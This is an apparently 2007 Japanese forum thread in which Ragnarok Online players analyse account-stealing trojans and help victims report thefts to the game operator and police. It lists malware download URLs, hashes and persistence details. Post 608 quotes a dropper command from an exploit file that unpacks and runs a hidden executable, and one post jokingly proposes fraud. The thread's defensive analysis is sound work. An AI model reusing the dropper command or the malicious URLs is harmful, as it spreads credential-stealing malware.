ttp://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/
>ボットと同じような言葉として「ゾンビ(zombie)」や「エージェント(agent)」などがある。

594 名前:(^ー^*)ノ〜さん:07/05/29 20:46 ID:6L7YyFpM0
>591
簡単に言えば、ハッカーに操られるPCの事。
自分が知らない間に、サーバアタックの攻撃者の一人になったり、ウィルスメールの
送信元になったりする。
そして最悪の場合、攻撃者の一人として訴えられて逮捕される恐れもある。

ttp://e-words.jp/w/E382BEE383B3E38393PC.html などを参照。

これ以上はセキュスレに話題を移した方がいいかな。

595 名前:(^ー^*)ノ〜さん:07/05/29 21:21 ID:egTTMfPi0
Gメンバーの垢ハック被害者のアイテムが帰って来た。

癌に報告(同時に装備売りさばいて居た商人報告)
→警察へ被害届出せとの事

警察に通報→中国からのハックらしいがこれ以上は捜査できないとの事。
捜査終了を癌に報告
アイテムが帰ってくる。(ここまで半年)
cと過剰武器防具が分離されて帰って来たらしい。

ハックされたアイテムを売りさばいて居た商人は
先々週位前にハック装備を売っていてまだ生きていたと本人は言って居た。

596 名前:(^ー^*)ノ〜さん:07/05/29 23:40 ID:OhFVgEey0
>>582
svch.exeはsvchost.exeと同じ60kBくらいの奴。
server.exeが70kBとMaranにしては大きいので、こちらは新型の予感。

597 名前:(^ー^*)ノ〜さん:07/05/30 01:16 ID:ybYRi8PE0
server.exe Trojan-Spy.Win32.Agent.nq

598 名前:(^ー^*)ノ〜さん:07/05/30 02:35 ID:nXlGUEr70
>>582 >>597
NOD32検出結果
svch.exe Win32/Pacex.Gen(自動提出)
server.exe Win32/Genetik トロイ の亜種(自動提出)

svch.exe 圧縮形式:なし
server.exe 圧縮形式:WinUpack 0.39 final -> By Dwing

599 名前:(^ー^*)ノ〜さん:07/05/30 03:12 ID:ybYRi8PE0
これも同じタイプか…。
www■korunowish■com/win.exe

www■korunowish■com/muma.txt
svch.exe
server.exe
更新チェックが面倒だな〜。

600 名前:(^ー^*)ノ〜さん:07/05/30 03:59 ID:nXlGUEr70
>>599
NOD32は全部自動提出になったものの、NOD32でもカスペでも検出可能ですた。

Kaspersky
win.exe : Trojan-Downloader.Win32.Delf.ade
svch.exe : Trojan-Spy.Win32.Agent.nq
server.exe : Trojan-PSW.Win32.Maran.ff

NOD32
server.exe : Win32/Pacex.Gen ウイルス
svch.exe : Win32/Genetik トロイ の亜種
win.exe : Win32/TrojanDownloader.Delf.ADE トロイ の亜種

601 名前:(^ー^*)ノ〜さん:07/05/30 04:33 ID:GGOe++L20
>>595
帰ってくることなんてあるのか
それにしても警察使えねーな、一個人に労力なんて割きたくないし国外には無力か
自衛大事

602 名前:(^ー^*)ノ〜さん:07/05/30 06:34 ID:5EZCCra70
>>601
現状では、ICPO経由か、外交ルートを通じて働きかける事のできるレベルの事件でないと、越境捜査が難しい現実。
犯罪件数の絶対数増加により、ようやく、日中捜査共助条約の締結に向けて動きが見えてきたけど。
ttp://www.nikkei.co.jp/china/news/20070410c3s1000d10.html

603 名前:(^ー^*)ノ〜さん:07/05/30 07:31 ID:8wEJoJIC0
ROの被害は無かったけどテンプレこっちでいいのかな?

【      気付いた日時          】2007/5/29 0:28:08
【不審なアドレスのクリックの有無 】不明
【他人にID/Passを教えた事の有無】No
【他人が貴方のPCを使う可能性の有無】No
【    ツールの使用の有無      】No
【  ネットカフェの利用の有無    】No
【     OS    】XP SP2
【使用ブラウザ 】IE 6.0
【WindowsUpdateの有無】自動及び手動で一週間以内
【 アンチウイルスソフト 】Norton Internet Security 2005
【その他のSecurty対策 】Spybot
【 ウイルススキャン結果 】
C:\〜\Temporary Internet Files\Content.IE5\JAB19P77\ani221[1].zip 疑わしい: Exploit.Win32.IMG-ANI.gen
C:\〜\Temporary Internet Files\Content.IE5\QWYDB908\ied[1].txt/ied.exe 感染: Trojan-Downloader.Win32.Mediket.dt
C:\〜\Temporary Internet Files\Content.IE5\QWYDB908\ied[1].txt CAB: 感染 - 1
【スレログやテンプレを読んだか】たまに見てた
【hosts変更】有だけど4/30頃
【PeerGuardian2導入】無
【説明】
定期で掛けたカスペのオンラインスキャンで上記の3つを検出
4日程前のチェックでは検出されてなかったので極最近だと思いますが
踏んだ直後ではなかったのでURLは判らないです。
すぐに普段使ってないサブPC(WIN2k SP4 IE6 NIS2005 UPDATEは定期的にやってた)の方で
『GungHo-IDパスワード』『アトラクションIDパスワード』『キャラパスワード』『メールアドレス』の変更と
被害無いのを確認。
オフライン環境で駆除とカスペ・トレンドフレックス・X-Cleanerのオンラインでチェックして
今は何も検出されてない状態ですが、調べてみてもウイルスの概要が判らなかったので
宜しければアドバイスお願いします。

604 名前:(^ー^*)ノ〜さん:07/05/30 09:10 ID:nXlGUEr70
んー。踏んじゃった対策だからこっちでもいいか。
WindowsUpdateしてるなら、大丈夫な気もするけど。

引っ掛かっているのはIEキャッシュのようですね。
1.ブラウザがキャッシュに読み込む
2.実際に表示や指定フォルダに保存の作業を行なおうとする
3.実行してしまう

この2の段階で検知してブロックした場合、1の作業ファイルは
IEの作業ファイルとして残っています。フルスキャンを行なった
場合に、この作業ファイルを検知したというだけではないでしょうか。
(最近、自動でブロックされたことはありませんか?)

ウィルスの詳細については、末尾は亜種の区分なので末尾を削ると
似たような動作をするものが出てくると思います。

Exploit.Win32.IMG-ANI.gen
   : アニメカーソルの脆弱性を突くものでWindowsUpdateかかってれば多分大丈夫
Trojan-Downloader.Win32.Mediket.dt
   : 末尾がcvの奴の説明↓。圧縮形式やファイル名などが異なるとは思うが概要は同じ。
    要するに他のトロイなどの本体を落とそうとするもの。データを直接盗み出すものではない。
ttp://www.avira.com/jp/threats/section/fulldetails/id_vir/3404/tr_dldr.mediket.di.html

そのied.txtというのが、踏んだページのキャッシュで、そこからied.exeというのを
入手させようとしたのかもしれない。そこで入手してしまったダウンローダが、
Win32.IMG-ANI.genをダウンロードしてきた(別のフォルダのキャッシュにある)が、
WindowsUpdateでブロックされた…筈。(断定はできないけど)

Trojan-Downloader.Win32.Mediketのみを発動させたんじゃないかと推測。

>オフライン環境で駆除とカスペ・トレンドフレックス・X-Cleanerのオンラインでチェックして
除去できているので、安心してもいいと思うが、あくまでも自己責任で。
どこで踏んだのかわからない不安が残るのなら、OSの再インストールコースを。

605 名前:(^ー^*)ノ〜さん:07/05/30 09:17 ID:3ol7GVul0
Temporary Internet Filesから見つかってるので、それらはIEのキャッシュという事。
ファイルのタイムスタンプ見てIEの履歴調べたら、いつどこで踏んだかってのは判るかも。

aniカーソルの脆弱性を突いた奴からDropperを掴まされたって感じだけど、詳細不明のため
アカハック系かどうかも不明。

>402-404の検証にもあるが、
>元のファイルが検出可であれば、感染後のファイルも検出可なのかと言うと、必ずしもそうではないようだ。
こういう事もありえるので、今見つかってないからといって、クリーンであるという保障にはならない。

特にキャッシュにだけ見つかって、発動本体と思われるものが検出されてないから
A)発動しなかったので検出できない
B)他の形になったので検出出来ない
>402の検証では、元ファイルは削除されるらしいし、どちらのパターンなのか判断が微妙。

すっかり安全、という自信が出来るまでは暫くはそのPCからのWeb閲覧やRO等は避けた方がいいかも。
不安が拭えないならOS再インストールのコースへ。

606 名前:(^ー^*)ノ〜さん:07/05/30 10:44 ID:94EhAgqx0
>>582の感染後調査

@MD5:7FBBBC283BEF9121536A244CC9D8B947 www■jpxpie6-7net■com/server■exe
AMD5:7FBBBC283BEF9121536A244CC9D8B947 → %WinDir%\system32\explorerf.exe
BMD5:957C50AB96BF1E2CC5A9DED16E01E14A → %WinDir%\system32\systemlf.dll

CMD5:DDEA4475B4A10D5DDC1D28180EDA2BE4 www■jpxpie6-7net■com/svch■exe
DMD5:17A6424A777022289C6B86D784F58C4F → %WinDir%\svchost.exe
EMD5:D7C0D46F22B75E7526DA76A0CCE8FDB2 → %WinDir%\system32\tjviwer.dll

[自動起動設定]
AHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに登録
Dサービスに登録(サービス名ADIDown 表示名Power Adapter)
EWinsock Providerに登録

[カスペルスキー検出名]
@ABTrojan-Spy.Win32.Agent.nq
CDETrojan-PSW.Win32.Maran.ff

@とAは同じファイルです。Bの中にターゲットはFFかなと思わせる文字列がちらほら。
C〜Eはいつものmaran。jROとリネ1がターゲット。感染後ファイルは>>522と同じものです。

607 名前:(^ー^*)ノ〜さん:07/05/30 10:46 ID:94EhAgqx0
>>576,605と同じタイプのウイルスと思われる>>599の感染後調査

@MD5:0EBDDF044F5AE1AA5086319D4EA2746F www■korunowish■com/win■exe
AMD5:0EBDDF044F5AE1AA5086319D4EA2746F → C:\Program Files\explord.exe
BMD5:B46FBDE092651D31FACA3BE6E459258D → %WinDir%\system32\systemlj.dll

CMD5:9927630F2D42D27276CCC25EA4FD23D5 www■korunowish■com/svch■exe
DMD5:9927630F2D42D27276CCC25EA4FD23D5 → %WinDir%\system32\explorerf.exe
EMD5:957C50AB96BF1E2CC5A9DED16E01E14A → %WinDir%\system32\systemlf.dll

FMD5:89F35450C6D160265FAB884EE2E7F378 www■korunowish■com/server■exe
GMD5:17A6424A777022289C6B86D784F58C4F → %WinDir%\svchost.exe
HMD5:C9028A19C60FBF246C1B39123A5DBED6 → %WinDir%\system32\tj1viwer.dll

ADHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに登録
Gサービスに登録(サービス名ADIDown 表示名Power Adapter)
HWinsock Providerに登録

カスペルスキー検出名
@ABTrojan-Downloader.Win32.Delf.ade
CDETrojan-Spy.Win32.Agent.nq
FGHTrojan-PSW.Win32.Maran.ff

Bは>>576のBと一致します。
Eは>>606のBと一致します。
Gは>>606のDおよび>>522と一致します。

608 名前:603:07/05/30 17:09 ID:5H97cS4m0
>>604
>(最近、自動でブロックされたことはありませんか?)
NIS2005では完全にスルーだったので実行までされてた可能性が高そうです

>>605
一応履歴も辿って感染元になったURLです判明しましたので
【不審なアドレスのクリックの有無 】http://cosplay-gallery■com/


再度貰ったので軽く見てみた所
ied[1].txtはヘッダがMSCFのCAB偽装ファイルで内部にide.exe

ani221[1].zipをテキストで開くと末尾に
md /c for /D %a in (%TEMP%\..\tempor~1\Content.ie5\*) DO if EXIST %a\ied[1].txt
expand %a\ied[1].txt \eied_s7_c_221ani.exe &\eied_s7_c_221ani.EXE &del \eied_s7_c_221ani.exe
の記述(Javaで>>604氏の説明にあったwww2.p0rt2.comからダウンされたっぽい?)

なんにしてもハッキリと得体が知れないの部分もあるので
お二人の仰る通り再インストールした方が良さそうですね・・・
助言ありがとうございました。

609 名前:(^ー^*)ノ〜さん:07/05/30 17:54 ID:XR/PvFmc0
>>601
ハック業者は捨てノビを何体も作り受け渡してはキャラ削除、ガンホーID削除していて
それだけでアイテムログが膨大になっていき、結局垢ハック露店にまでたどり着けないらしいよ。
ROの古いシステムが追跡を困難にもしているみたいです。
で、ログ追えたりSSなどで分かるアイテムだけはガンホーが補填してくれるようです。

610 名前:(^ー^*)ノ〜さん:07/05/30 18:20 ID:3ol7GVul0
>608
mdに/cなんてオプションあったっけ?と暫く悩んだが、cmd /cの事か。

そのコードは、Temporary Internet Filesの中に ied[1].txt が無いか探して
見つかった場合、eied_s7_c_221ani.exeとして解凍→exeを実行→exeを削除
という動き。


以下想像

閲覧時にキャッシュにani221[1].zipとied[1].txtが保存された。
本来ならaniカーソルの脆弱性を突いてコードが発動、ied[1].txtに仕込まれた
eied_s7_c_221ani.exe が実行される。

しかしWindowsUpdateをしていたので罠コードは発動せず、IEのキャッシュにその
2ファイルが残っただけになっていて、カスペがそれを検出した。

こんな感じで、罠の発動・感染はしてなかったんじゃないかと思う。

ただ確証がないので、あくまで想像だけど。

611 名前:(^ー^*)ノ〜さん:07/05/30 21:10 ID:CuWrk/WE0
The Eir in Ragnarok Online !! コミュニティの
はBOT撲滅デー というトピックより
(投稿した人のmixiネームは一応伏せておきます)

2007年05月30日
17:27

明日はアサシンギルド事件から一年が経過します。
この事件からROは色んな事件や騒ぎが起きましたが、現状のROでは去年よりBOTが減ったり、プレイしやすい環境に変化したのでしょうか?

「BOTを見ても、いつもの事・・・」

で、BOTを受け入れてしまわないように 5/20 は、ユーザーがBOTに対して「BOTは違反」と言う認識を再確認する

「BOT撲滅デー」

と言う事にしませんか?
アサシンギルド事件のやり方問題は別として、彼らのお陰で全てが始まったのですからね。


※アサシンギルド事件を知らない方は下記参照です BOTNEWSより
http://www■ro-bot■net/10657/

612 名前:(^ー^*)ノ〜さん:07/05/30 21:13 ID:CuWrk/WE0
書き忘れ

URLは既出が多いですがmixiのコミュニティのいろいろな所に本文と危険URLを変えて貼られているようなのでその内の一つを掲載しました。

613 名前:(^ー^*)ノ〜さん:07/05/30 21:30 ID:noEjIf/z0
>>611
sesコミュニティの方にもまったく同じ書き込みが・・・。

614 名前:(^ー^*)ノ〜さん:07/05/30 21:54 ID:arMq2jgL0
本文の選択がむかつくな糞中華め・・・
とりあえず張った奴をmixi側に通報したいところだが、トロイでmixiのパスを盗まれた人のかもしれんのだよね。

615 名前:(^ー^*)ノ〜さん:07/05/30 22:04 ID:G+U91kkX0
なんにせよ野放しにして置くわけにはいかないでしょ
「mixi垢事盗まれてるのだとしたらその人が可哀想」なんて言ってる場合ではないと思う

616 名前:(^ー^*)ノ〜さん:07/05/30 22:08 ID:ZLxcIuI80
垢盗まれて何のアクションも起こさないのは、被害者ではなくむしろ加害者であると

617 名前:(^ー^*)ノ〜さん:07/05/30 22:20 ID:arGC51BY0
ところで、友達登録で垢ハックってされますか??

618 名前:(^ー^*)ノ〜さん:07/05/30 22:25 ID:PaHpXzrV0
されません

619 名前:(^ー^*)ノ〜さん:07/05/30 22:34 ID:5EZCCra70
ゲーム中の、なら無理な話。
mixiの場合だと、挨拶文に誘導リンクを盛り込むことは可能だが、リンク自体を踏まなければ発動はしない。

620 名前:(^ー^*)ノ〜さん:07/05/30 22:38 ID:arGC51BY0
当方IRISですが、受諾で垢ハックされるという友録が飛び交っています。
真偽はわかりませんが、人ごみの中でも発信するあたり、何らかのツールを使っているものかと。

621 名前:(^ー^*)ノ〜さん:07/05/30 22:42 ID:hviFas2S0
ん?そんなの仕様的に無理じゃないか?

622 名前:(^ー^*)ノ〜さん:07/05/30 22:54 ID:nXlGUEr70
>>620
ツールを使っても、飛び交ってないデータは取得できません。単なるデマです。
間違った情報を、不正確な理解で流布しないように注意して下さいね。

623 名前:(^ー^*)ノ〜さん:07/05/30 22:57 ID:yEISwhrk0
「ボクの知り合いのスパーハカー」みたいなものと思えばOK。

ログイン時に鯖と認証するためIDとPASSは流れるが、そこで終わり。
認証が済めばプレイできるが、ROのプレイ中にはPASSは一切流れない。
ゲーム内で流れてないものを、どうやって傍受するのかと。

PASS等を傍受するには、ログイン時に傍受するしかなく、そのためには
結局トロイを踏ませるとかの手段しかない。
ゲーム内でそれを行うことは不可能で、トロイや何らかの罠ツールといった
ゲーム外での仕込みが必要。

だいたいそんな事でハクれるなら、中華がわざわざ次々にトロイを
改良したり、ドメインとりまくったり、罠URL貼りまくったり、と涙ぐましい
努力をしてる意味がない。
そんな事しなくても、中華は簡単にハクれるって事になる。

ちなみにその噂を流してるのは、取引要請で倉庫キャラと狩りキャラの
取引が邪魔されるのを嫌ったBOTer、という説もあるぐらい、昔からある
都市伝説じみた話。

624 名前:(^ー^*)ノ〜さん:07/05/30 22:58 ID:PaHpXzrV0
どうせなら中華露店から買うとハクられるって噂流してくれ

625 名前:(^ー^*)ノ〜さん:07/05/30 23:13 ID:nXlGUEr70
>>624
不正確な情報と思い込みが一番困るんだ。相談受ける立場の人が困るからやめてくれ。

>>623
取り引き確認の為に要請出したBOT(または商人かのび側)が友達登録を飛ばしてくることはある。
(取り引きの間のタイミングだったり、要請窓開いちゃったりした後の行動として)
だけど、要請飛ばしてくるのは商人10体に1体もいない。飛ばしてくる奴は、執拗に要請を出す。

試したことは無いが、同じMAP内であれば、1:1ウィンドウの右クリックでも友達要請が飛ばせるらしい。
その場合、620の言うような人ごみでも要請飛ばしてくるに該当するかもしれない。
要請を飛ばしてくる相手がキャラを右クリックして送ってるとは限らないということ。

友達登録の要請理由はわからないが、垢ハックと無関係。

626 名前:(^ー^*)ノ〜さん:07/05/31 00:49 ID:TwxBrHCC0
友達要請を受けたら、BOTの飼い主として晒す罠とか

627 名前:(^ー^*)ノ〜さん:07/05/31 00:51 ID:Sh/9mmse0
BANされる時に巻き添え食わそうとしているとかいう可能性も考えられるな。
とりあえずは要請は蹴った方が無難という事で。
移動中とかに出されるとミスクリックでok押したりしそうで嫌だが・・

628 名前:(^ー^*)ノ〜さん:07/05/31 08:48 ID:8lloDV3t0
>>606,607
マカフィーのウイルス情報
ttp://www.mcafee.com/japan/security/virPQ2006.asp?v=PWS-FFantasy
を見ると、カスペのウイルス名、ドロップするファイル名、レジストリへの登録が、
606の@〜B、607のC〜Eと一致するので、FinalFantasy狙いということで合ってそう。

629 名前:(^ー^*)ノ〜さん:07/05/31 08:55 ID:cAMoJaJ80
既知の罠ドメインだけどMEスレに張られていたので報告

>985 名前:Alfons☆ Mail: 投稿日:2007/05/31(木) 01:38:43 [ TJOsrnIg ]
>
>[RO]第6回ガンホーオフミは6月17日に新潟で
>第6回ガンホーオフラインミーティングの開催概要が発表され、参加者募集が開始されました。
>・「第6回ガンホーオフラインミーティング」開催のご案内(ガンホー)
>[参考] www■cityhokkai■com/games/
>***第6回ガンホーオフミ概要*** ■日時
> 2007年6月17日(日)13:00〜16:00
>■開催場所
>(以下略)

httpつけてないあたり、専ブラ使いを狙ったのか、単に置き換えただけで
そこまで気が付いてなかっただけなのか。

スレ住人がすぐに警告出すから大きな問題にはならないと思うけど、あそこは管理人の
不在期間が長すぎて、3月ぐらいに貼られた罠アドレス書き込みや罠スレも削除されてない。
ちょっと危険かも。

630 名前:(^ー^*)ノ〜さん:07/05/31 15:47 ID:BnIKcrFW0
【      気付いた日時          】 5/31 13:45
【不審なアドレスのクリックの有無 】 職wikiは見てたがリンクは全てチェッカー掛けてから使用
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (No)
【    ツールの使用の有無      】 (No)
【  ネットカフェの利用の有無    】 (No)
【     OS    】 (Windows2000)
【WindowsUpdateの有無】 (先月の20日ぐらい)
【 ウイルススキャン結果】 現在確認中
【スレログやテンプレを読んだか】 (Yes)
【hosts変更】(無
【PeerGuardian2導入】(無 )
【説明】
30日の夜中から頻繁にMAP移動の際、ログアウトするようになっており
自分はPC性能低い為、それが原因だと思っていましたが今思うと中華がログインしてたんだと思われます

本日13時にログインすると装備、Zeny、がサイン以外全て無くなっていました
癌に通告後、警察に出向く予定ですが実際行った人居ればどうすればいいかご教授願いたい

631 名前:(^ー^*)ノ〜さん:07/05/31 16:02 ID:HREh4d1L0
1つ聞きたいんだけど、MAP移動の際にログアウトっていつもそうだったの?
同垢ログインされたら、「同じアカウントでログインが〜」みたいなメッセージが出てから叩き落されたんだと思うけど。
普通にMAP移動の時に「サーバーとの接続がキャンセルされました」って出たら、そりゃ気づかないわなぁ

632 名前:(^ー^*)ノ〜さん:07/05/31 16:08 ID:BnIKcrFW0
普通にクライアント自体が終了ですね

633 名前:(^ー^*)ノ〜さん:07/05/31 16:21 ID:8lloDV3t0
>>630
警察に行った人ではないんだけど、
トロイが見つかったら、証拠としてキープしておいた方が良いかも。
捜査の役に立つかもしれないし、消してしまったらそれまでだから。

634 名前:(^ー^*)ノ〜さん:07/05/31 17:10 ID:PcwTJkRd0
質問です。
このアドレス、
ttp://ruizatan■shonbori■com/blog/
は、アカウントハックの危険性はあるのでしょうか…。

一応自分なりに調べてはみたのですが、結局のところよくわからず…
皆様の助言をいただきたいです。

635 名前:(^ー^*)ノ〜さん:07/05/31 17:14 ID:NHKznjde0
>>634
>>1

636 名前:(^ー^*)ノ〜さん:07/05/31 17:16 ID:uFgE2Zd50
>>634
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

昔ROの記事を書いていたようだが?長期放置の後、いまや空白。
空白なんだから行ってもなんにも無い、ソースもからっぽ。

637 名前:(^ー^*)ノ〜さん:07/05/31 17:17 ID:NHKznjde0
俺NHKだ…、集金してくる

638 名前:634:07/05/31 17:19 ID:PcwTJkRd0
ぐあ、申し訳ない…
1にも目を通していたつもりだったんですが、もっとしっかり見ておくべきでした。
申し訳ありません。

実は自分で踏んでしまいまして、噂の「真っ白なページ」だった為に、もしや!と思った次第でした。
スレ汚し失礼しましたーm(_ _)m

639 名前:(^ー^*)ノ〜さん:07/05/31 17:57 ID:XcVJEgbk0
>>630
少なくとも、セキュリティソフトが発見・削除した際のログがあればいいと思う。
本体の保存は、知識がないと難しいかも。

警察に行った経験のある人の報告が非常に少ないのが困り物か。
思い付くだけの資料を書き出してみる。

■申し立ての概要をまとめた文書■
 オンラインゲーム「RagnarokOnlin」の、アカウントハッキングによる
 不正アクセスの為、ゲーム内通貨・ゲーム内アイテムを盗まれてしまった。

 オンラインゲーム管理会社:
  ガンホー・オンライン・エンターテイメント株式会社
  〒100-0006 東京都千代田区有楽町一丁目2番2号 東宝日比谷ビル
  TEL 03-5511-1400(代表)
 ガンホーゲームズコールセンター:
  メールサポート
  billsup@gungho.jp (受付時間:24時間365日)
 コールサポート
  TEL:03-5651-6068 (受付時間:14:00〜21:00 )

■以下、別紙資料■
・報告者の、住所氏名、連絡先(日中と、その他の時間帯の連絡先を両方記載する)
 メールアドレスではなく、電話番号など。メールアドレスはあくまでもおまけ。
・ガンホーID/アカウントID
 (パスワードは記載しないこと/IDは必要ないかもしれないので、
 記載したものと未記載の2枚用意して必要な方を提出すること)
・プレイサーバー名/盗難のあったキャラクター名
・下記のページのプリントアウト(下記の部分)
 ttp://www.ragnarokonline.jp/news/play/032.html
>■運営チームの対応■
> 警察等から捜査を行うため協力して欲しいと連絡があった場合、運営チームで得られた調査結果を
>警察等に提出させていただくことがあります。なお、警察等の公的機関「以外」から情報を公開して欲しいと
>依頼があっても、運営チームが保有する機密情報や他のユーザー様の個人情報等を公開することはありません。

640 名前:(^ー^*)ノ〜さん:07/05/31 17:57 ID:XcVJEgbk0
>>630(続き)

・ガンホーに報告した文面の印刷。Webフォームへの投稿内容でいいでしょう。
・もしガンホーのフォームに返答が入っていれば、その内容も

・自分が正常にログアウトした日時(一番最近)
・頻繁に切断された日時(アカウントハックが行われたであろう日時)
 クライアントが終了したという挙動も報告。
・実際にアイテム等が無くなっていたのを確認した日時(2007/05/31 13:45)
>>630に書いたテンプレの内容(ツール・パス教え・ネカフェなど)の印刷
・ウィルス検査結果のログ(プリントアウト/データはもちろん保存しておく)
・自分が接続しているIPアドレス(固定IPでないのであれば、接続業者名でもいいかな)
・所持していた物品をわかる範囲で正確に。
 あれば証拠として直近のSS(アイテムなどの写っているもの)の印刷
・現時点で、倉庫・アイテム・Zenyが消失していることのわかるSSを印刷したもの全キャラクター分。

 ログと比較し、虚偽があれば、時間がかかるうえにアイテムが戻ってこないこともあり得る。
 絶対に嘘は書かないこと。わからないことは、はっきりとわからないと記載。

報告先
ttp://www.ragnarokonline.jp/playguide/play_manner/account_management.html#t3
>すぐにWEBヘルプデスクより報告してください。また、最寄りの警察署や「サイバー犯罪相談窓口」に
>ご相談することをおすすめします。

641 名前:633:07/05/31 18:37 ID:8lloDV3t0
>>639
いや、トロイの本体は極力あった方が良いと思うのです。
というのも、トロイ本体を解析すれば、パスの送信先が確実に分かるので、
プロバイダのログと照らし合わせることにより、
アカハックにあったという事実を証明しやすいと思うからです。

ウイルスチェックのログだけでは、結局残るのはウイルス名だけで、
トロイの機能はまったく同じで、送信先だけが異なる亜種が例えば10種類存在したとすれば、
その10種は多分同じウイルス名で扱われることになると思います。
なので、あとで警察がウイルス対策ソフト会社に
「このウイルス名のウイルスに感染した場合の、送信先を教えて下さい」と
問い合わせても、一概には答えられない可能性があると思うのです。

ウイルス対策ソフト会社が該当ウイルスの亜種を全種キープしてれば別ですが、
そうとも限らないと思うので、感染した本体そのものがあった方が確実だと思った次第です。

642 名前:(^ー^*)ノ〜さん:07/05/31 19:00 ID:XcVJEgbk0
>>641
事実を証明しやすいのは確かだけどね、殆どの人は、除去が精一杯で、誤爆の危険がないように
保存する方法なんて説明するだけの労力に合いません。

なんせ、国外からであることが判明した時点で、それ以上の捜査はほぼ停止するのですから。
管理会社からの接続記録だけで十分でしょう。

求められるのは、盗まれた、zenyとitemの復元であり、場合によっては(調査の為に)プレイできなかった期間に
対するなんらかの保証程度でしょう。垢ハックを行なった「相手への追求」というのは、現実的ではありません。

だから、結局、本体があればそれも提出。但し、必須条件ではないということで。

※ LiveROに移動した方がいいですかね?

643 名前:630:07/05/31 19:13 ID:BnIKcrFW0
630ですがスキャン終了してウィルス見つかりました
名前の方upしておきます
svchost
ti2.viewer.dllの二つです 後者はいかにもって感じですね
後情報の後だしみたいで失礼ですが被害の前日の
頻繁にログアウトしていた時、再度接続したさい、自キャラにパスワード打たないで入れました

644 名前:630:07/05/31 19:25 ID:BnIKcrFW0
ってウィルス名は別でした すみませぬ
感染: Trojan-PSW.Win32.Maran.cj
両方とも上記のウィルスに感染しておりました

645 名前:(^ー^*)ノ〜さん:07/05/31 19:29 ID:XcVJEgbk0
>>643
>頻繁にログアウトしていた時、再度接続したさい、自キャラにパスワード打たないで入れました

それは関係無いので気にするな。

>スキャン終了してウィルス見つかりました

可能なら、zipか何かに固めてFDDかCD-Rに書込んで添付。誤爆感染があり得るので、生で書込まないように。
ただ、固める時点でもセキュリティソフト反応するので一時的に切るとか面倒くさい。戻し忘れると危険な状態なので
注意すること。自信がなければ、本体の添付よりも除去を優先で。

盗まれちゃった後だと、除去(安全な環境の作成)と、パスワード変更はそんなに緊急でもないんだけどね。
(これ以上盗まれるもんない訳だし orz)

646 名前:633:07/05/31 19:49 ID:8lloDV3t0
すみません。大事なことだと思ってるので、もう一レスだけ・・・

>>642
>なんせ、国外からであることが判明した時点で、それ以上の捜査はほぼ停止するのですから。
>垢ハックを行なった「相手への追求」というのは、現実的ではありません。

いえ、そうではなくて・・・・。
本体の確保は、あくまでも送信先を1点に絞り、プロバのログと照らし合わせて
アカハックの事実を証明する。またその時間を短縮するためのものと考えて下さい。
犯人を特定するために本体を確保するのではありません。

毎日一人あたり何十M、何百M、あるいはG単位の送受信があってもおかしくないですし、
パケの内容までプロバに残ってるとも思えません。残ってるのは多分送信先だけだと思うので、
中国国内へのアクセスログがあったところで、それがトロイによるパスの送信なのか、
単にブラウザで閲覧してただけなのか、その区別も付かないような気がします。

でも実際のところ、警察がどう動くのかもまったく分からないので、
そんなのいらないよと言われるかもしれませんが、消してしまっては
取り返しが付かなくなるので、確保して置いた方がよいかなと思った次第です。

でも、危険があるのも事実ですからね。
ごめんなさい。もうこれ以上のレスはやめておきます。
630さん、これから大変だと思いますが、がんばってください。

647 名前:(^ー^*)ノ〜さん:07/05/31 20:27 ID:+7rneYkT0
正直な所、中華相手に詐欺やっても追求されないってことじゃね。

中華からzeny格安で買い取りかけて踏み倒そうぜ。

648 名前:(^ー^*)ノ〜さん:07/05/31 20:36 ID:XcVJEgbk0
>>646
プロバイダでも、そこまでの資料残してるかな?

言っちゃ悪いけど、「たかが、(財物としての価値が法的に確定していない)オンラインゲームのアイテムと仮想通貨」の為に
垢ハックトロイの解析をする程の無駄な人件費を、公的機関がかけるとは思えない。
(車の当て逃げとかの物的損害があった場合でも、人身事故でもない限り、殆ど捜査しないし)

>消してしまっては 取り返しが付かなくなるので、確保して置いた方がよいかなと思った次第です。

だから、そこは誰も否定してないって。

と、ここまでの流れでわかるように、「実際のところ、警察がどう動くのかもまったく分からない」というのが現実で
どんな資料を要求されたとか、どんなことを聞かれたといったことだけでも、実際に動いた630さんの証言が
投稿されることを期待しています。

649 名前:(^ー^*)ノ〜さん:07/05/31 21:22 ID:5ErxpHs90
>>648
タバコやガムを道端に投棄した奴がいたとして
DNA鑑定までするか? てことだね。
殺人事件ならするだろうけどねぇ。

警察に行く時は印鑑と身分証明を忘れずに。印鑑を忘れて
代わりに調書に指紋を押して嫌な気分になったことがある。

650 名前:630:07/05/31 22:06 ID:BnIKcrFW0
自分の装備を売ってる中華露店を見つけた
SSは撮ったが癌に提出するべき?

651 名前:(^ー^*)ノ〜さん:07/05/31 22:30 ID:XcVJEgbk0
>>650
しとけ

652 名前:(^ー^*)ノ〜さん:07/05/31 22:33 ID:NHKznjde0
1から10まで聞くんでなくて自分で考えてやれることはやっておいたらいいんでないかい?

653 名前:630:07/05/31 22:46 ID:BnIKcrFW0
これに関しては確実に証拠無いと癌に何か言われそうだったんで…すみませぬ
通報してきました

654 名前:(^ー^*)ノ〜さん:07/05/31 23:41 ID:3Vc7wkoB0
ROのイラスト系のブログに貼られていた垢ハクアドレスを報告します

http://www■rinku-livedoor■com

これに添えて、「私もROの絵描いてます。来てください」みたいなコメントあり

655 名前:(^ー^*)ノ〜さん :07/05/31 23:58 ID:qOCewXH90
>>630
ハッキングは犯罪なので、ガンホーは警察へいけとしか言わないとおもう。
虚偽かもしれんし、ハッキング被害だけみるとガンホーに実害がないわけだしね。
で、警察からの照会があって初めてガンホーは動く。
そしてログなどから被害者以外のIPからの接続が判明して、ガンホーが許可した人意外のアクセスになるので
不正なアクセスとしてこんどはガンホーが不正アクセス被害者になる。
最近装備が返ってくるとの報告が結構あって、ガンホーが思ったより協力的だったとか言うけど、
ガンホーがハック調査に協力的なんじゃなくて不正アクセス被害者だから警察からの調査要請に協力せざるえないだけ。
ガンホーにはいつ頃ハックURLを踏んでしまったとか、倉庫に装備やらアイテムが無くなっていた日付。
そしてわたしの装備だと思われるものを売っている露店商人って感じの連絡で良いと思います。
あとは警察にガンホーに連絡した文章とか証拠になるものを揃えて駆け込み。
時間経過によるログの自然消滅とかある為に時間勝負になるから早く警察に行く事。

